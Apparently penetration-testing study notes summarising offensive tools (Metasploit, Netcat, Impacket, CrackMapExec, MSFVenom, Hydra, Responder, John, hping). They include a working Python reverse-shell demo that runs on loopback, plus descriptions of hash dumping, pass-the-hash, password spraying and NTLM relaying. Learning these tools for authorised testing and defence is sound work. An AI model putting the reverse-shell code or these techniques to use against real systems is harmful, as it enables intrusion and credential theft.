Exploit Tools:NOTES

Metasploit

Framework of exploit modules and payloads; identifies potential exploits for the services and versions found during enumeration and provides the ability to configure and execute them, with handlers for the resulting sessions;

Netcat

Creates raw TCP/UDP communication channels between two systems; usually preinstalled on Linux; on Windows, install Nmap to get the equivalent ncat command; put a system into a listening state on a chosen port so it can accept a connection later (the listener); connect out to a remote host and port; traffic is plaintext unless ncat's --ssl option is used;

Impacket

Python library for working with network protocols at the packet level (SMB, MSRPC, Kerberos, LDAP and others) and for performing network exploitation tasks; from GitHub; ships with built-in example scripts; [MOST USEFUL AFTER OBTAINING A VALID USERNAME AND PASSWORD OR HASH] e.g. smbclient.py for SMB share access and enumeration; Active Directory user enumeration; password hash dumping (secretsdump.py); remote command execution via wmiexec.py (also psexec.py and smbexec.py);

CRACKMAPEXEC

Uses protocols (SMB, LDAP, WinRM, MSSQL) to collect information about many systems at once; discover computers on a network; dictionary and password-spraying attacks against those protocols (mind account lockout policies); dump SAM databases; authenticates with either a password or an NT hash (pass-the-hash), so a dumped hash can be reused without cracking it;

MSFVenom

Generates custom payloads (e.g. Meterpreter) for many platforms and output formats; reverse connections: deliver a payload to a system that, when executed, connects back to your machine, where a listener (e.g. Metasploit's multi/handler) is waiting; set the payload's LHOST/LPORT to match that listener; once connected, the session allows file system commands, networking commands, system commands (including clearing event logs, which is itself a detectable action), keylogging, screenshots, webcam access, privilege-elevation commands, and much more;
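The listener / reverse-connection pattern from the Netcat and MSFVenom notes above, as an added example that is not part of the original notes or of either tool's code: both sides are written in Python and run on loopback. The operator side does what `nc -lvnp PORT` or a Metasploit handler does (bind a port and wait), and the target side does what a reverse payload does (connect out to the listener and execute whatever it sends). The function names, the end-of-output framing marker and the `echo pwned` command are all made up for the demo; in a real engagement only the operator half would run on your machine.

```python
import socket
import subprocess
import threading

END = b"\x00<END>\x00"  # hypothetical framing: marks the end of one command's output


def start_listener(host="127.0.0.1"):
    """Operator side: bind an ephemeral port and wait for a callback, like `nc -lvnp`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))          # port 0 = let the OS pick a free port for the demo
    srv.listen(1)
    return srv, srv.getsockname()[1]


def _read_until(conn, buf, delim):
    """Read from conn until delim appears; return (text before delim, leftover bytes)."""
    while delim not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the channel")
        buf += chunk
    payload, buf = buf.split(delim, 1)
    return payload.decode(errors="replace"), buf


def operator_session(srv, commands):
    """Accept one callback, send each command, and collect the output it returns."""
    conn, _peer = srv.accept()
    srv.close()                  # one session is enough for the demo
    outputs, buf = [], b""
    with conn:
        banner, buf = _read_until(conn, buf, b"\n")
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            out, buf = _read_until(conn, buf, END)
            outputs.append(out)
        conn.sendall(b"exit\n")
    return banner, outputs


def callback(host, port):
    """Target side: connect *out* to the listener and run each line it sends as a
    shell command; this outbound direction is what lets reverse payloads pass
    egress-only firewalls."""
    with socket.create_connection((host, port)) as s:
        s.sendall(f"callback from {socket.gethostname()}\n".encode())
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode().strip()
                if cmd == "exit":
                    return
                proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
                s.sendall((proc.stdout + proc.stderr).encode() + END)


def run_demo(commands):
    """Wire both halves together on loopback and return what the operator saw."""
    srv, port = start_listener()
    seen = {}

    def operator():
        seen["banner"], seen["outputs"] = operator_session(srv, commands)

    t = threading.Thread(target=operator)
    t.start()
    callback("127.0.0.1", port)  # on a real target this is the payload, not your script
    t.join()
    return seen


if __name__ == "__main__":
    print(run_demo(["echo pwned"]))
```

The order matters in practice exactly as in the demo: the listener must be up before the payload runs, otherwise the callback fails and the session is lost. Note that the channel is plaintext, so anything typed into it (including credentials) is visible to whoever is capturing traffic in between.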

Hydra – online brute-force and dictionary attacks against network login services (SSH, FTP, HTTP forms, RDP, SMB and others); noisy, and may trigger account lockouts;

Responder – LLMNR/NBT-NS/mDNS name-resolution poisoning attacks; retrieves NetNTLM challenge-response hashes from hosts that accept the spoofed answers, which can then be cracked offline or relayed (e.g. with Impacket's ntlmrelayx.py);

John (John the Ripper) – cracks hashes offline with wordlists, rules and incremental modes; pick the format that matches the hash type (an NT hash from a SAM dump is not the same as a NetNTLMv2 capture from Responder);

hping – crafts custom TCP/UDP/ICMP packets (custom "ping" messages with chosen flags, ports and TTLs) for port scanning, firewall rule testing and traceroute-style probing;
